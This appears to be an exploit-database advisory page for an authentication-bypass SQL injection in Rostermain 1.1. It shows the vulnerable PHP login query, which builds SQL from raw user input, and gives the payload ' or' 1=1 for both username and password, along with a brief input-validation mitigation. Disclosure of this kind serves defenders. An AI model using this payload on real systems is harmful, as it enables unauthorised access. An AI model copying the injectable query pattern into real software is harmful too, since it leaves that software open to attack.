header-logo
Suggest Exploit
vendor:
Rostermain
by:
cr4wl3r
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Rostermain
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: NO
Related CWE: N/A
CPE: a:ringsworld:rostermain:1.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Rostermain <= 1.1 (Auth Bypass) SQL Injection Vulnerability

Rostermain version 1.1 is vulnerable to an authentication bypass vulnerability due to improper sanitization of user input. An attacker can exploit this vulnerability by providing a crafted username and password in the login form. The crafted username and password should be ' or' 1=1. This will bypass the authentication and allow the attacker to access the application.

Mitigation:

Input validation should be performed on user input to prevent SQL injection attacks.
Source

Exploit-DB raw data:

[+] Rostermain <= 1.1 (Auth Bypass) SQL Injection Vulnerability
[+] Discovered by cr4wl3r <cr4wl3r[!]linuxmail.org>
[+] Download : http://scripts.ringsworld.com/games-and-entertainment/rostermain/


[+] Vuln Code : 

[index.php]

if ($_POST['userid'] && $_POST['password'])
{
  // if the user has just tried to log in
  $logquery = "select * from users "
           ."where username='$userid' "
           ." and passwd='$password' ";

[+] PoC : 

username :  ' or' 1=1
password :  ' or' 1=1

Navigation

Suggest Exploit

Services By CQR